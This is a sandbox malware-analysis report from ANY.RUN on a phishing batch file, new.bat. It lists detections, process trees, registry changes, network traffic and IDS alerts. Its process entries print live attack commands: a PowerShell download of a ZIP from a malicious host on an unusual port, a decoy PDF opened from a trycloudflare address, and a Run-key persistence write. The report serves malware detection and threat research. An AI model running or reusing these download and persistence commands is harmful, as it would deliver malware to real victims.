File name:

new.bat

Full analysis: https://app.any.run/tasks/dd506a97-8721-4c17-86de-5bd40fec5e3b
Verdict: Malicious activity
Analysis date: July 27, 2024, 21:05:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
phishing
Indicators:
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (14150), with no line terminators
MD5:

2BD3CD5D43151A3DA40C26AD7A63E150

SHA1:

D6F881F60F447D3E14FD81E1CE1BC660A6E6DAA9

SHA256:

83126357A369AFD90C496CBB7D0081A8B5AE4AE43EA5E7DF582B93F241677BED

SSDEEP:

384:13c9iaKYfl4T2mQvOP3ieQ9UGd2jhnhgvX:9c9iaKYfl4qmQvOP3ieQ9UGd2jhnhgvX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 6396)

    • PHISHING has been detected (SURICATA)

      • msedge.exe (PID: 7300)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6524)

  • SUSPICIOUS

    • Application launched itself

      • Skype.exe (PID: 1340)

    • Uses REG/REGEDIT.EXE to modify registry

      • Skype.exe (PID: 1340)

    • Reads security settings of Internet Explorer

      • Skype.exe (PID: 1340)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1896)

    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 1896)

    • Downloads file from URI

      • powershell.exe (PID: 1296)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1896)

    • Detected use of alternative data streams (AltDS)

      • Skype.exe (PID: 1340)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6524)

    • Connects to unusual port

      • powershell.exe (PID: 1296)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1296)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6524)

    • Process drops python dynamic module

      • powershell.exe (PID: 6524)

  • INFO

    • Creates files or folders in the user directory

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 1780)

    • Reads the software policy settings

      • slui.exe (PID: 5900)
      • slui.exe (PID: 1584)
      • Skype.exe (PID: 1340)

    • Manual execution by a user

      • Skype.exe (PID: 1340)
      • mspaint.exe (PID: 6476)
      • cmd.exe (PID: 1896)

    • Reads Environment values

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)

    • Reads the computer name

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 1780)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)

    • Reads CPU info

      • Skype.exe (PID: 1340)

    • Checks supported languages

      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 2960)
      • Skype.exe (PID: 1780)
      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)

    • Checks proxy server information

      • Skype.exe (PID: 1340)
      • slui.exe (PID: 1584)
      • slui.exe (PID: 5900)
      • powershell.exe (PID: 1296)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 3688)

    • Process checks computer location settings

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)

    • Create files in a temporary directory

      • Skype.exe (PID: 1340)

    • Reads the machine GUID from the registry

      • Skype.exe (PID: 1340)

    • Application launched itself

      • msedge.exe (PID: 2396)

    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 2396)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6524)

    • Disables trace logs

      • powershell.exe (PID: 1296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
194
Monitored processes
60
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start notepad.exe no specs slui.exe slui.exe skype.exe skype.exe no specs skype.exe no specs skype.exe reg.exe conhost.exe no specs skype.exe no specs reg.exe no specs conhost.exe no specs mspaint.exe no specs cmd.exe no specs conhost.exe no specs skype.exe no specs msedge.exe timeout.exe no specs powershell.exe msedge.exe no specs reg.exe no specs conhost.exe no specs msedge.exe no specs #PHISHING msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs skype.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
524"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6560 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
968"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar" --no-sandbox --no-zygote --enable-blink-features --disable-blink-features --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --ms-disable-indexeddb-transaction-timeout --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3992 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exeSkype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
1244"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6088 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1296powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipnng.site:4727/DXJS.zip' -OutFile 'C:\Users\admin\Downloads\DXJS.zip' }"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1340"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Desktop\new.bat.txt"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
explorer.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
1584C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1780"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --mojo-platform-channel-handle=2460 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Skype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
1896C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\new.bat.txt.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2068timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2396"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://vancouver-mats-describe-survival.trycloudflare.com/kyvbsa.pdfC:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
34 513
Read events
34 444
Write events
50
Delete events
19

Modification events

(PID) Process:(6396) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Skype for Desktop
Value:
C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(PID) Process:(1340) Skype.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation:delete valueName:en-US
Value:
(PID) Process:(1340) Skype.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation:delete valueName:en
Value:
(PID) Process:(1340) Skype.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation:delete valueName:_Global_
Value:
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2396) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(2396) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
Executable files
45
Suspicious files
106
Text files
415
Unknown types
0

Dropped files

PID
Process
Filename
Type
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\settings.datbinary
MD5:9D0439A794AA96ABD6AFF504C86C7F31
SHA256:5DBC3A5DAF431973E245D83AB51B128E9C4CC2F3ECD61C45C88DB161ACC25B7B
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dictext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b916037c1e115fe0.customDestinations-msbinary
MD5:8786405114010246400E95724DC017A4
SHA256:0D6D2287D81B396EE757B7BEAA9F1931E7A462705CB6BFF6960174705A786587
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.oldtext
MD5:46EED8B7CAAD25F7F453617DA0FB0857
SHA256:5BC1DE0E32F2969386351B2BE088F13B6CC3DF7693EE9E92FEEF59DB6AF1FB92
4288Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.confbinary
MD5:99914B932BD37A50B983C5E7C90AE93B
SHA256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.jsonbinary
MD5:95D3A9F5B2C5989A3E6A174FB3E21820
SHA256:5961A7DCBB98937F89DA58A47266F3E90DF340B8D255050312EB98356A006E70
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Spelling\en-US\default.acltext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
4288Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.tmpbinary
MD5:99914B932BD37A50B983C5E7C90AE93B
SHA256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Code Cache\wasm\indexbinary
MD5:54CB446F628B2EA4A5BCE5769910512E
SHA256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Local Storage\leveldb\MANIFEST-000001binary
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
51
TCP/UDP connections
87
DNS requests
57
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
OPTIONS
200
23.48.23.26:443
https://bzib.nelreports.net/api/report?cat=bingbusiness
unknown
unknown
GET
401
13.107.6.158:443
https://business.bing.com/api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox
unknown
unknown
GET
304
13.107.42.16:443
https://config.edge.skype.com/config/v1/Edge/122.0.2365.59?clientId=4489578223053569932&agents=EdgeRuntime%2CEdgeRuntimeConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=35&mngd=0&installdate=1661339457&edu=0&bphint=2&soobedate=1504771245&fg=1
unknown
unknown
1296
powershell.exe
GET
57.128.129.21:4727
http://trackmyshipnng.site:4727/DXJS.zip
unknown
unknown
GET
20.190.160.17:443
https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=0&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf
unknown
unknown
GET
40.126.32.133:443
https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=2&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf
unknown
unknown
GET
304
204.79.197.239:443
https://edge.microsoft.com/abusiveadblocking/api/v1/blocklist
unknown
unknown
POST
200
23.48.23.51:443
https://bzib.nelreports.net/api/report?cat=bingbusiness
unknown
text
21 b
unknown
GET
200
204.79.197.239:443
https://edge.microsoft.com/entityextractiontemplates/api/v1/assets/find-assets?name=edge_hub_apps_manifest_gz&version=4.10.*&channel=stable&key=d414dd4f9db345fa8003e32adc81b362
unknown
text
266 b
unknown
POST
200
104.126.37.136:443
https://gateway.bingviz.microsoftapp.net/receive?app=skype
unknown
binary
15 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
131.253.33.254:443
a-ring-fallback.msedge.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3952
svchost.exe
239.255.255.250:1900
whitelisted
104.126.37.171:443
www.bing.com
Akamai International B.V.
DE
unknown
132
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2796
slui.exe
40.91.76.224:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6012
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6964
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2432
slui.exe
40.91.76.224:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
t-ring-fdv2.msedge.net
  • 13.107.237.254
unknown
a-ring-fallback.msedge.net
  • 131.253.33.254
unknown
www.bing.com
  • 104.126.37.171
  • 104.126.37.177
  • 104.126.37.163
  • 104.126.37.130
  • 104.126.37.145
  • 104.126.37.128
  • 104.126.37.123
  • 104.126.37.179
  • 104.126.37.186
  • 104.126.37.139
  • 104.126.37.185
  • 104.126.37.136
  • 104.126.37.178
  • 104.126.37.131
  • 104.126.37.129
  • 2.23.209.133
  • 2.23.209.149
  • 2.23.209.185
  • 2.23.209.140
  • 2.23.209.187
  • 2.23.209.130
  • 2.23.209.179
  • 2.23.209.182
  • 2.23.209.189
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.78
whitelisted
self.events.data.microsoft.com
  • 40.79.189.58
whitelisted
get.skype.com
  • 52.113.194.133
whitelisted
a.config.skype.com
  • 13.107.42.16
whitelisted
pipe.skype.com
  • 20.189.173.1
  • 20.189.173.11
whitelisted
b.config.skype.com
  • 13.107.42.16
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
7300
msedge.exe
Potentially Bad Traffic
ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300
msedge.exe
Potentially Bad Traffic
ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300
msedge.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Cloudflare Domain Abuse for Phishing or OpenDir Purposes (RGDA)
1296
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
new.bat